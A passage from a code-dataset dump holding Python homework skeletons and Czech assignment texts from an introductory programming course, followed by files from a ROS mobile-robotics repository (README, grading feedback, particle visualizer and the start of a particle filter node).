Mentees of a mentor are ordered by names.\n\n Hint:\n Use `get_founder` and `print_mentorship_subtree` helper functions.\n Args:\n people: dictionary mapping names to Person objects\n\n >>> people = {}\n >>> people['Martin'] = Person('Martin', 1991, 'phd')\n >>> people['Lukas'] = Person('Lukas', 1991, 'phd')\n >>> people['Tom'] = Person('Tom', 1993, 'mgr')\n >>> people['Honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['Martin'], people['Tom'])\n >>> create_mentorship(people['Tom'], people['Honza'])\n >>> create_mentorship(people['Martin'], people['Lukas'])\n >>> print_mentorship_tree(people)\n Martin (1991)\n Lukas (1991)\n Tom (1993)\n Honza (1995)\n \"\"\"\n # TODO\n pass\n\n\ndef print_mentorship_subtree(person, level=0):\n \"\"\"Print person with all transitive mentees as a tree.\n Indents each level by 2 spaces. Mentees of a mentor are ordered by names.\n\n Args:\n person: Person at the root of the printed tree\n level: number of double-spaces to add before each printed line\n (level=0 for 0 space, level=1 for 2 spaces, etc.)\n\n >>> people = {}\n >>> people['tom'] = Person('Tom', 1993, 'mgr')\n >>> people['honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['tom'], people['honza'])\n >>> print_mentorship_subtree(people['tom'], level=1)\n Tom (1993)\n Honza (1995)\n \"\"\"\n # TODO\n pass\n\n\ndef count_transitive_mentees(person):\n \"\"\"Return number of transitive mentees of given person.\n\n Transitive mentees are all person's mentees, mentees of these mentees, etc.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> lukas = Person('Lukas', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, lukas)\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> count_transitive_mentees(martin)\n 3\n >>> count_transitive_mentees(tom)\n 1\n >>> count_transitive_mentees(honza)\n 0\n \"\"\"\n # TODO\n pass\n\n\ndef count_transitive_mentees_with_degree(person, degree):\n \"\"\"Return number of transitive mentees who persue given degree.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> count_transitive_mentees_with_degree(martin, 'bc')\n 1\n \"\"\"\n # TODO\n pass\n\n\ndef get_transitive_mentors(person):\n \"\"\"Return list with a person's mentor, mentor of this mentor, etc.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> honza = Person('Honza', 1995, 'bc')\n >>> create_mentorship(martin, tom)\n >>> create_mentorship(tom, honza)\n >>> [person.name for person in get_transitive_mentors(honza)]\n ['Tom', 'Martin']\n \"\"\"\n # TODO\n pass\n\n\ndef get_person_with_most_mentees(people):\n \"\"\"Return the person who has most mentees (counting direct mentees only).\n\n Args:\n people: dictionary mapping names to Persons\n\n >>> people = {}\n >>> people['Martin'] = Person('Martin', 1991, 'phd')\n >>> people['Lukas'] = Person('Lukas', 1991, 'phd')\n >>> people['Tom'] = Person('Tom', 1993, 'mgr')\n >>> people['Honza'] = Person('Honza', 1995, 'bc')\n >>> create_mentorship(people['Martin'], people['Lukas'])\n >>> create_mentorship(people['Martin'], people['Tom'])\n >>> create_mentorship(people['Tom'], people['Honza'])\n >>> get_person_with_most_mentees(people).name\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef get_team_year_of_birth_median(team):\n \"\"\"Return median year of 
birth of team members.\n\n If the team has even number of members,\n return the smaller of the two years in the middle.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('a', 1990, 'phd'))\n >>> team.add_member(Person('b', 1995, 'bc'))\n >>> team.add_member(Person('c', 1996, 'bc'))\n >>> get_team_year_of_birth_median(team)\n 1995\n >>> team.add_member(Person('d', 1996, 'bc'))\n >>> get_team_year_of_birth_median(team)\n 1995\n \"\"\"\n # TODO\n pass\n\n\ndef get_most_common_degree_in_team(team):\n \"\"\"Return degree which occurs most times in the team.\n\n If there are multiple degrees which appears most times, return any of them.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('a', 1990, 'phd'))\n >>> team.add_member(Person('b', 1995, 'bc'))\n >>> team.add_member(Person('c', 1996, 'bc'))\n >>> get_most_common_degree_in_team(team)\n 'bc'\n \"\"\"\n # TODO\n pass\n\n\ndef print_team_info(team):\n \"\"\"Prints name, members, median year of birth and the most common degree.\n\n Members are printed from the oldest to the youngest.\n\n >>> team = Team('InterJeLen')\n >>> team.add_member(Person('Petra', 1995, 'bc'))\n >>> team.add_member(Person('Pavla', 1996, 'bc'))\n >>> team.add_member(Person('Matej', 1990, 'phd'))\n >>> print_team_info(team)\n ----------------\n Team: InterJeLen\n ----------------\n Matej (1990)\n Petra (1995)\n Pavla (1996)\n --\n median year of birth: 1995\n most common degree: bc\n \"\"\"\n # TODO\n pass\n\n\ndef print_all_teams_info(teams):\n \"\"\"Print info about all given teams. Teams are ordered by names.\n\n >>> teams = {'x': Team('x'), 'y': Team('y')}\n >>> teams['x'].add_member(Person('a', 1995, 'bc'))\n >>> teams['y'].add_member(Person('b', 1996, 'bc'))\n >>> print_all_teams_info(teams)\n -------\n Team: x\n -------\n a (1995)\n --\n median year of birth: 1995\n most common degree: bc\n -------\n Team: y\n -------\n b (1996)\n --\n median year of birth: 1996\n most common degree: bc\n \"\"\"\n # TODO\n pass\n\n\ndef get_common_members_names(team1, team2):\n \"\"\"Return set of persons' names that are members of both teams.\n\n Return:\n set of persons' names\n\n >>> intersob = Team('InterSoB')\n >>> interlos = Team('InterLoS')\n >>> a = Person('a', 1995, 'bc')\n >>> b = Person('b', 1995, 'bc')\n >>> c = Person('c', 1995, 'bc')\n >>> intersob.members = [a, b]\n >>> interlos.members = [b, c]\n >>> get_common_members_names(intersob, interlos)\n {'b'}\n \"\"\"\n # TODO\n pass\n\n\ndef get_common_teams_names(person1, person2, teams):\n \"\"\"Return set of teams (their names) in which are both persons.\n\n Args:\n person1: Person\n person2: Person\n teams: dictionary mapping team names to Team objects\n\n Return:\n set of teams' names\n\n >>> teams = {'x': Team('x'), 'y': Team('y'), 'z': Team('z')}\n >>> a = Person('a', 1995, 'bc')\n >>> b = Person('b', 1995, 'bc')\n >>> teams['x'].add_member(a)\n >>> teams['y'].add_member(a)\n >>> teams['y'].add_member(b)\n >>> teams['z'].add_member(b)\n >>> get_common_teams_names(a, b, teams)\n {'y'}\n \"\"\"\n # TODO\n pass\n\n\ndef process_person_line(line, people):\n \"\"\"Parse one line of input file containg info about a person.\n \"\"\"\n name, year, degree = line.split(',')\n people[name] = Person(name, int(year), degree)\n\n\ndef process_mentor_line(line, people):\n \"\"\"Parse one line of input file containg info about a mentorship.\n\n >>> petra = Person('Petra', 1993, 'mgr')\n >>> pavla = Person('Pavla', 1995, 'bc')\n >>> people = {'Petra': petra, 'Pavla': pavla}\n >>> 
process_mentor_line('Petra->Pavla', people)\n >>> pavla.mentor.name\n 'Petra'\n >>> petra.mentees == [pavla]\n True\n \"\"\"\n # TODO\n pass\n\n\ndef process_team_line(line, people, teams):\n \"\"\"Parse one line of input file containg info about a team.\n\n >>> petra = Person('Petra', 1995, 'bc')\n >>> pavla = Person('Pavla', 1995, 'bc')\n >>> people = {'Petra': petra, 'Pavla': pavla}\n >>> teams = {}\n >>> process_team_line('InterJeLen:Petra,Pavla', people, teams)\n >>> teams['InterJeLen'].members == [petra, pavla]\n True\n \"\"\"\n # TODO\n pass\n\n\ndef read_file(filename):\n \"\"\"Read file and return list of lines. Remove new lines.\n\n >>> lines = read_file('members.txt')\n >>> len(lines)\n 34\n >>> lines[:3]\n ['=== People ===', 'Martin,1991,phd', 'Maara,1989,phd']\n \"\"\"\n # TODO\n pass\n\n\ndef read_data(filename='members.txt'):\n \"\"\"Read and parse data in given filename; return people and teams.\n Function expects data in the same format as in example 'members.txt' file.\n No input data validation is performed.\n\n Return:\n (people, teams): dictionaries mapping names to Person/Team objects\n\n >>> people, teams = read_data()\n >>> len(people)\n 14\n >>> people['Tyna'].describe()\n 'Tyna (1993)'\n >>> len(teams)\n 4\n >>> print_team_info(teams['InterSoB'])\n --------------\n Team: InterSoB\n --------------\n Lukas (1991)\n Tom (1993)\n Radka (1994)\n Dominika (1995)\n --\n median year of birth: 1993\n most common degree: mgr\n \"\"\"\n people, teams = {}, {}\n lines = read_file(filename)\n mode = None # current section of the file: 'people', 'mentors' or 'teams'\n for line in lines:\n if line == '=== People ===':\n mode = 'people'\n elif line == '=== Mentors ===':\n mode = 'mentors'\n elif line == '=== Teams ===':\n mode = 'teams'\n elif mode == 'people':\n process_person_line(line, people)\n elif mode == 'mentors':\n process_mentor_line(line, people)\n elif mode == 'teams':\n process_team_line(line, people, teams)\n else:\n raise ValueError('Invalid state when reading file.')\n return people, teams\n\n\ndef main():\n \"\"\"Read data about members of the association and print some info.\n \"\"\"\n people, teams = read_data()\n print('longest name:', get_longest_name(people))\n print('founder:', get_founder(people).name)\n print_mentorship_tree(people)\n print('transitive mentees of Lukas:',\n count_transitive_mentees(people['Lukas']))\n print('transitive mgr mentees of Lukas:',\n count_transitive_mentees_with_degree(people['Lukas'], 'mgr'))\n print('transitive mentors of Ondra:',\n [person.name for person in get_transitive_mentors(people['Ondra'])])\n print('person with most mentees:',\n get_person_with_most_mentees(people).name)\n print_all_teams_info(teams)\n print('common members of InterSoB and KSI:',\n get_common_members_names(teams['InterSoB'], teams['KSI']))\n print('common teams of Dominika and Vlada:',\n get_common_teams_names(people['Dominika'], people['Vlada'], teams))\n\n\ndef test():\n \"\"\"Check examples in docstrings.\n\n If the actual output matches the expected output, doesn't print anything.\n Otherwise, it prints an error message showing the mismatch.\n \"\"\"\n import doctest\n doctest.testmod()\n\n\nif __name__ == \"__main__\":\n #main()\n test()\n"
},
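The mentorship-tree part of the skeleton above comes down to two small pieces: wiring the mentor/mentee references in `create_mentorship`, and a recursion over mentees for the transitive counts. A stripped-down sketch, with `Person` reduced to a name (no year or degree) so the example stays short:

```python
class Person:
    def __init__(self, name):
        self.name = name
        self.mentor = None
        self.mentees = []


def create_mentorship(mentor, mentee):
    mentee.mentor = mentor
    mentor.mentees.append(mentee)


def count_transitive_mentees(person):
    # Each direct mentee counts once, plus everyone below them in the tree.
    return sum(1 + count_transitive_mentees(m) for m in person.mentees)


martin, tom, honza = Person('Martin'), Person('Tom'), Person('Honza')
create_mentorship(martin, tom)
create_mentorship(tom, honza)
print(count_transitive_mentees(martin))  # 2
```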
{
"alpha_fraction": 0.6975568532943726,
"alphanum_fraction": 0.7287278771400452,
"avg_line_length": 39.931034088134766,
"blob_id": "d5fd261fafe7d8ba479f3bb1e89112b0ad21287f",
"content_id": "9d0940a21944a422327b72627e193eff891c33ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 58,
"path": "/homeworks/homework_02.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 2\n* Termín odevzdání: soft deadline je 15.10., ale odevzdávat můžete až do 22.10.\n* Za úlohu můžete dostat až 25 bodů\n* Budete odevzdávat jeden soubor `homework_02.py` s funkcemi pojmenovanými podle zadání\n* Odevzdávárna [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 2](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw2/)\n* Funkce a proměnné pojmenovávejte výstižně, ale stručně\n* Snažte se držet společného jazyka programátorů (angličtiny) jak v kódu, tak i ve výpisu\n* Komentáře jsou jako sůl. Je potřeba, ale neobraťte tam celou solničku ;)\n* Pracujte samostatně\n\n## Hadi a žebříky\nVaším úkolem bude naprogramovat zjednodušenou verzi Hadů a žebříků ([Snakes and Ladders](https://en.wikipedia.org/wiki/Snakes_and_Ladders)).\n\n### Pravidla:\n* hraje se na hracím plánu délky `length`\n* figurka začíná na jednom z konců\n* háže se standardní šestistěnnou koskou\n* pokud padne 6, tak se háže znovu (stále se počítá jako jeden tah)\n* figurka se posune o součet hodů, ale zůstane stát pokud by se dostala za cíl (tj. musí se trefit přesně)\n* každé `n`-té políčko je had, který figurku posune o `k` políček zpět (pouze jednou za tah)\n\n### Poznámky\n* pro délku hracího plánu `length < 2` nebo pro `n <= 0` funkci skončete a vypište smysluplnou hlášku\n\n### Kostra\n```\nfrom random import randint, random\n\ndef game(length, n, k, output = True):\n pass\n \ndef game_analysis(length, n, k, count):\n pass\n \ndef game_average_length(count):\n pass\n```\n\n### Úkol\n* funkce `game` nasimuluje jednu hru a vrací počet tahů, pokud je parametr `output` roven `True`, pak funkce průběžě vypisuje stav hry (viz níže)\n* funkce `game_analysis` nasimuluje `count` her se zadanými parametry a vrací průměrný počet tahů\n* funkce `game_average_length` nasimuluje `count` her pro kombinace parametrů `length` 10 - 20, `n` 2 - 4 a `k` 1 - 3 a pro každou kombinaci vypíše průměrný počet tahů v nějakém pěkném formátu\n\n### Ukázkový výpis funkce `game`\n```\n>>> game(20, 4, 2)\nTurn 1: 3 -> new position: 3\nTurn 2: 1 -> new position: 2\nTurn 3: 6 3 -> new position: 11\nTurn 4: 5 -> new position: 14\nTurn 5: 4 -> new position: 18\nTurn 6: 3 -> new position: 18\nTurn 7: 2 -> new position: 20\nGame finished at turn 7\n```\n\n### Bonus\nZa tuto úlohu bude možné získat nějaké bonusové body za úpravu první funkce, aby stav hry znázorňovala graficky (pomocí různých znaků).\n"
},
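The sample transcript in the assignment above fixes the game mechanics: a rolled 6 triggers a reroll whose result is added within the same turn, overshooting the goal leaves the token in place, and landing on a multiple of `n` (other than the goal) slides it back by `k`. A sketch of the simulation core, with the progress printing and the length/n validation from the assignment left out:

```python
from random import randint


def roll_turn():
    """Roll a d6; on a 6 keep rolling; return the sum for this turn."""
    total = 0
    while True:
        roll = randint(1, 6)
        total += roll
        if roll != 6:
            return total


def game(length, n, k):
    """Simulate one game and return the number of turns it took."""
    position, turns = 0, 0
    while position != length:
        turns += 1
        target = position + roll_turn()
        if target <= length:  # must hit the goal exactly, otherwise stay put
            position = target
            if position % n == 0 and position != length:  # snake square
                position = max(position - k, 0)
    return turns


print(game(20, 4, 2))  # e.g. 7
```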
{
"alpha_fraction": 0.719031035900116,
"alphanum_fraction": 0.7544503808021545,
"avg_line_length": 36.84027862548828,
"blob_id": "2d65fff98715007496d1545a21f2fcab45d29a5c",
"content_id": "5a6ea9da352a7f851aafb99b78dc3bf9adef0ae2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5870,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 144,
"path": "/homeworks/homework_04.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 4: Objekty\n* Termín odevzdání: neděle 3. 12 (soft deadline).\n* Pro případ nouze bude odevzdávárna otevřená až do 10. 12. (hard deadline).\n* Odevzdejte jediný soubor `homework_04.py` s implementací požadovaných metod a funkcí.\n* Vyjděte z [připravené kostry](homework_04.py), zachovejte hlavičky funkcí, dokumentační řetězce i testy.\n* Odevzdávárna:\n [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 4](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw4/)\n* Pište přehledný kód, používejte vhodná jména proměnných, odstraňte duplicitní kód.\n* Případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Úlohu vypracujte zcela samostatně.\n* Řešení domácí úlohy si užijte :-)\n\n## Zadání\n\nV souboru [members.txt](members.txt) jsou data o členech fakultního Spolku přátel severské zvěře.\nO každém členovi evidujeme jeho jméno, rok narození a stupeň studia.\n(O jménech můžete předpokládat, že jsou unikátní.)\nKaždý člen spolku, kromě jeho zakladatele, má právě jednoho mentora.\nNapř. řádek `Martin->Tom` vyjadřuje, že Martin je Tomův mentor.\nMentorství tvoří stromovou hierarchii (tj. nejsou tam cykly).\nPoslední částí souboru jsou týmy pro jednotlivé soutěže, které Spolek organizuje.\nKaždý tým má název a seznam členů.\nMůžete předpokládat, že vstupní soubor má přesně takový formát jako ten ukázkový (netřeba ošetřovat prázdné řádky navíc a jiné odchylky od formátu).\n\nVaším úkolem je tento soubor načíst\na vytvořit reprezentaci jednotlivých členů (třída `Person`) a týmů (třída `Team`).\nK reprezentaci kolekcí využijte slovníky mapující jména na objekty,\ntakže např. `people['Martin']` bude odkazovat na objekt třídy `Person` reprezentující Martina.\nKaždý objekt třídy `Person` má kromě jména, roku narození a stupně studia\ntaké mentora a seznam svých mentorovaných (`mentees`).\n\nS členy spolku a týmy pak budeme chtít např.\n najít nejdelší jméno,\n vykreslit strom mentorství,\n či vypsat přehled všech týmů (viz vzorový výstup níže).\nPřipravená kostra obsahuje popis všech požadovaných funkcí včetně vzorového chování\nv tzv. dokumentačních řetězcích (uzavřené do trojitých uvozovek hned za hlavičkou funkce).\n\nNěkteré funkce využívají pojmu *transitive mentors* a *transitive mentees*.\nPokud osoba A má mentora B, B má mentora C, C má mentora D a D žádného mentora nemá (tj. je to zakladatel), pak tranzitivními mentory osoby A jsou B, C i D.\nA naopak, tranzitivními mentorovanými (*transitive mentees*) osoby D\njsou A, B, C (a všichni další mentorovaní těchto osob a jejich mentorovaní, atd.)\n\n\n## Kostra\nVyjděte z [připravené kostry](homework_04.py), zachovejte hlavičky funkcí, dokumentační řetězce i testy.\nZ kostry můžete mazat pouze příkazy `pass` a `TODO` značky -\nty ale smažte až poté, co danou metodu či funkci implementujete.\nPokud některou funkci zvládnete implementovat jen částečně (např. 
bude fungovat jen pro některé vstupy), tak `TODO` komentář v kódu ponechte a doplňte jej o popis, co už vaše funkce umí a co jí chybí k dokonalosti.\n\nKostra obsahuje funkci `main()`,\nkterá načte soubor a volá implementované funkce pro načtená data,\na funkci `test()`, která ověří, že funkce fungují na ukázkových případech popsaných v dokumentačních řetězcích.\nOdkomentováním volání funkce `test()` na posledním řádku si tak můžete ověřit,\njestli vaše implementace fungují aspoň na ukázkových případech.\n(Pokud ne, tak značku `TODO` u takové funkce neodstraňujte.)\nPodobně si zkontrolujte, zda výstup funkce `main()` odpovídá vzorovému výstupu níže.\n\n## Bodování\nKostra obsahuje 4 metody a 18 funkcí k doplnění (označené pomocí `TODO`).\nZa každou funkční metodu získáte 1 bod, za každou funkci 2 body.\nCelkem tedy můžete získat až 40 bodů.\nPodmínkou k získání plného počtu bodů je kromě funkčnosti také přehledný a čitelný kód.\nOvěřte si i dodržovaní konvencí (jména proměnných, mezery) pomocí pylintu.\n\nPokud některé funkce nezvládnete implementovat,\nzakomentujte před odevzdáním část metody `main` tak, aby byl soubor spustitelný.\n\n## Sebehodnocení\nPřed odevzdáním doplňte na začátek souboru komentář s odhadem získaných bodů.\nVzhledem k tomu, že by počet bodů měl jít přímočaře spočítat z počtu\nzbývajících `TODO`, zkuste případnou odchylku stručně vysvětlit.\n\n\n## Vzorový výstup\n```\nlongest name: Dominika\nfounder: Martin\nMartin (1991)\n Lukas (1991)\n Radka (1994)\n Anicka (1997)\n Dominika (1995)\n Tyna (1993)\n Viki (1995)\n Vlada (1991)\n Maara (1989)\n Jan (1993)\n Tom (1993)\n Honza (1995)\n Ondra (1997)\n Katka (1994)\ntransitive mentees of Lukas: 6\ntransitive mgr mentees of Lukas: 2\ntransitive mentors of Ondra: ['Honza', 'Tom', 'Martin']\nperson with most mentees: Radka\n--------------\nTeam: InterLoS\n--------------\nVlada (1991)\nJan (1993)\nRadka (1994)\nKatka (1994)\nDominika (1995)\n--\nmedian year of birth: 1994\nmost common degree: mgr\n--------------\nTeam: InterSoB\n--------------\nLukas (1991)\nTom (1993)\nRadka (1994)\nDominika (1995)\n--\nmedian year of birth: 1993\nmost common degree: mgr\n---------\nTeam: KSI\n---------\nVlada (1991)\nHonza (1995)\nDominika (1995)\nViki (1995)\nAnicka (1997)\nOndra (1997)\n--\nmedian year of birth: 1995\nmost common degree: bc\n--------------\nTeam: PoznejFI\n--------------\nMaara (1989)\nMartin (1991)\nTom (1993)\nTyna (1993)\nAnicka (1997)\n--\nmedian year of birth: 1993\nmost common degree: bc\ncommon members of InterSoB and KSI: {'Dominika'}\ncommon teams of Dominika and Vlada: {'InterLoS', 'KSI'}\n```\n"
},
{
"alpha_fraction": 0.6545842289924622,
"alphanum_fraction": 0.668443500995636,
"avg_line_length": 31.34482765197754,
"blob_id": "3b00690214d6bfcba64032526f3aca58a236831e",
"content_id": "8a0dfcc63f02365b7b6862f11752bb5e7304dc21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 29,
"path": "/homeworks/homework_03.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "def print_board(state):\n # state - reprezentace stavu hry\n # funkce vypise na obrazovku stav hry v nejake pekne forme\n # nic nevraci\n pass\n\ndef play(rows, columns, player1 = \"human\", player2 = \"human\"):\n # rows - pocet radku hraciho pole (nabyva hodnot >= 1)\n # columns - pocet sloupcu (nabyva hodnot >= 3)\n # player1 / player2 - urcuje, kdo jsou hraci, player1 zacina (nabyva hodnot \"human\", \"computer\")\n # vraci 0 pokud remiza, jinak cislo vyherce\n pass\n\ndef check_win(state):\n # state - reprezentace stavu hry\n # vraci cislo vyherce nebo 0 pokud nikdo nevyhral\n pass\n\ndef human_play(state, number):\n # state - reprezentace stavu hry\n # number - cislo hrace (1 nebo 2)\n # vraci cislo sloupce, ktery hrac vybral\n pass\n \ndef computer_play(state, number):\n # state - reprezentace stavu hry\n # number - cislo hrace (1 nebo 2)\n # vraci cislo sloupce, ktery pocitac vybral\n pass\n"
}
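For `check_win` in the skeleton above, scanning from every occupied cell along four direction vectors covers rows, columns and both diagonals without separate code paths. A sketch, using the list-of-rows board representation the notes suggest:

```python
def check_win(state):
    """Return the number of the player with four in a row, or 0."""
    rows, cols = len(state), len(state[0])
    directions = [(0, 1), (1, 0), (1, 1), (1, -1)]  # right, down, two diagonals
    for r in range(rows):
        for c in range(cols):
            player = state[r][c]
            if player == 0:
                continue
            for dr, dc in directions:
                if all(0 <= r + i * dr < rows and 0 <= c + i * dc < cols
                       and state[r + i * dr][c + i * dc] == player
                       for i in range(4)):
                    return player
    return 0


board = [[0, 0, 0, 0],
         [0, 2, 2, 0],
         [1, 1, 1, 1]]
print(check_win(board))  # 1
```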
] | 11 |
shehzi001/amr-ss
|
https://github.com/shehzi001/amr-ss
|
83d10106b52a2653abe3d6babad756fcdca7ffb2
|
7668d332e4f4fe31252b8eb36a4cd168c442d946
|
72e4f9b6237069495d547b8c855081db4a65638f
|
refs/heads/master
| 2020-04-12T14:41:25.460665 | 2014-06-24T11:16:03 | 2014-06-24T11:16:03 | 30,924,785 | 0 | 1 | null | 2015-02-17T16:05:31 | 2014-09-06T16:30:46 | 2014-09-06T16:30:46 | null |
[
{
"alpha_fraction": 0.7209302186965942,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 31.25,
"blob_id": "de44b168d2cba9486ffdd2d7e9af5d0e05dfdef5",
"content_id": "da09d69d7db758b4c537190c6c2f1b762c9e480d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 4,
"path": "/README.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "amr-public\n==========\n\nAll manuals and other information can be found in the wiki at https://github.com/brsu-amr/amr-public/wiki\n"
},
{
"alpha_fraction": 0.7025411128997803,
"alphanum_fraction": 0.726457417011261,
"avg_line_length": 28.086956024169922,
"blob_id": "f5542b8d5998ae1c5b28ac96e746b519403eff17",
"content_id": "042401b97bb48c89240fa5506097bb63ec8f0b0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 23,
"path": "/grades/20140524.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1\n* Correct intermediate maps update: 2/2\n* Masking and normalization of occupied regions: 1/1\n* Correct probability-computing function: 2.5/3\n* Rounding error protection: 1/1\n* Proper handling of \"open\" sensor readings: 1/2\n\n_Total:_ 8.5 points\n\nFeedback\n========\n\nYou did not use the provided method to convert coordinates to cell coordinates. \nThe method does a similar thing like what you do but you forgot the lround() step.\n\nThis part of the code seems to be error prone\n```\n if (distance >= max_range) { distance = max_range * 2; }\n```\nYou could have capped the distance instead of changing it. This has a bad effect on the free map.\n"
},
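The capping suggestion from the feedback above, spelled out: an "open" reading should saturate at the sensor's maximum range, so the free-space update stops where the beam stopped being informative. Shown in Python for brevity (the graded code is C++), with a hypothetical helper name; `min` does the whole job.

```python
def cap_reading(distance, max_range):
    """Clamp an 'open' sensor reading to the sensor's maximum range.

    Doubling the reading (distance = max_range * 2) would mark cells the
    beam never observed as free; capping updates only the observed cells.
    """
    return min(distance, max_range)


print(cap_reading(7.5, max_range=5.0))  # 5.0
```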
{
"alpha_fraction": 0.6769428253173828,
"alphanum_fraction": 0.6923571228981018,
"avg_line_length": 33.57777786254883,
"blob_id": "5c0057837275c3c0e31b7466d59483f6943ee5b1",
"content_id": "b84219a361c284857602690ddb82b5fbe5d108cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1557,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 45,
"path": "/amr_localization/src/particle_visualizer.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <tf/tf.h>\n#include <visualization_msgs/Marker.h>\n#include <visualization_msgs/MarkerArray.h>\n\n#include \"particle_visualizer.h\"\n\nParticleVisualizer::ParticleVisualizer(const std::string& topic_name, const std::string& frame_id)\n: frame_id_(frame_id)\n{\n ros::NodeHandle nh;\n marker_publisher_ = nh.advertise<visualization_msgs::MarkerArray>(topic_name, 1);\n}\n\nvoid ParticleVisualizer::publish(const ParticleVector& particles)\n{\n if (marker_publisher_.getNumSubscribers() == 0) return;\n\n double min = std::min_element(particles.begin(), particles.end())->weight;\n double max = std::max_element(particles.begin(), particles.end())->weight;\n double range = (max - min) * 0.9;\n\n visualization_msgs::MarkerArray markers;\n for (const auto& particle : particles)\n {\n visualization_msgs::Marker marker;\n marker.ns = \"particles\";\n marker.header.frame_id = frame_id_;\n marker.type = visualization_msgs::Marker::ARROW;\n marker.action = visualization_msgs::Marker::ADD;\n marker.scale.x = 0.6;\n marker.scale.y = 0.1;\n marker.scale.z = 0.2;\n marker.color.a = range > 0 ? 0.1 + (particle.weight - min) / range : 1.0;\n marker.color.r = 0.0;\n marker.color.g = 0.2;\n marker.color.b = 0.8;\n marker.pose.orientation = tf::createQuaternionMsgFromYaw(particle.pose.theta);\n marker.pose.position.x = particle.pose.x;\n marker.pose.position.y = particle.pose.y;\n marker.pose.position.z = 0.05;\n marker.id = markers.markers.size();\n markers.markers.push_back(marker);\n }\n marker_publisher_.publish(markers);\n}\n\n"
},
{
"alpha_fraction": 0.6849335432052612,
"alphanum_fraction": 0.6913543343544006,
"avg_line_length": 37.930233001708984,
"blob_id": "d17634a3b8603c9c8b1324090d26da50b9f0676a",
"content_id": "d186e59d03ae57672fd728512bbc3f5c85454d7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6697,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 172,
"path": "/amr_localization/nodes/particle_filter.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <tf/tf.h>\n#include <tf/transform_listener.h>\n#include <tf/transform_broadcaster.h>\n#include <geometry_msgs/PoseWithCovarianceStamped.h>\n\n#include <amr_srvs/GetPoseLikelihood.h>\n\n#include \"particle_filter.h\"\n#include \"particle_visualizer.h\"\n\nclass ParticleFilterNode\n{\n\npublic:\n\n ParticleFilterNode()\n {\n // Query parameters from server\n ros::NodeHandle pn(\"~\");\n double update_rate;\n double world_width;\n double world_height;\n pn.param<double>(\"update_rate\", update_rate, 5.0);\n pn.param<std::string>(\"frame_id\", frame_id_, \"pf_pose\");\n // This will block until the stage node is loaded and has set the world\n // dimensions parameters\n while (!nh_.hasParam(\"world_width\") || !nh_.hasParam(\"world_height\"))\n ros::spinOnce();\n nh_.getParam(\"world_width\", world_width);\n nh_.getParam(\"world_height\", world_height);\n\n // Compute world extent\n double min_x, max_x, min_y, max_y;\n min_x = - world_width / 2.0;\n max_x = world_width / 2.0;\n min_y = - world_height / 2.0;\n max_y = world_height / 2.0;\n\n // Create particle filter and visualizer\n particle_filter_ = ParticleFilter::UPtr(new ParticleFilter(min_x, max_x, min_y, max_y, std::bind(&ParticleFilterNode::computeParticleWeight, this, std::placeholders::_1)));\n particle_visualizer_ = ParticleVisualizer::UPtr(new ParticleVisualizer(\"particles\", \"odom\"));\n\n // Quick Fix, reason is updateCallback: transform is used even though an error was catched, which happens at the start\n ros::Duration(1.0).sleep();\n\n // Schedule periodic filter updates\n update_timer_ = nh_.createTimer(ros::Rate(update_rate).expectedCycleTime(), &ParticleFilterNode::updateCallback, this);\n\n // Misc\n pose_estimate_subscriber_ = pn.subscribe<geometry_msgs::PoseWithCovarianceStamped>(\"pose_estimate\", 1, boost::bind(&ParticleFilterNode::poseEstimateCallback, this, _1));\n pose_likelihood_client_ = nh_.serviceClient<amr_srvs::GetPoseLikelihood>(\"/pose_likelihood_server/get_pose_likelihood\");\n previous_pose_.setIdentity();\n ROS_INFO(\"Started [particle_filter] node.\");\n }\n\n 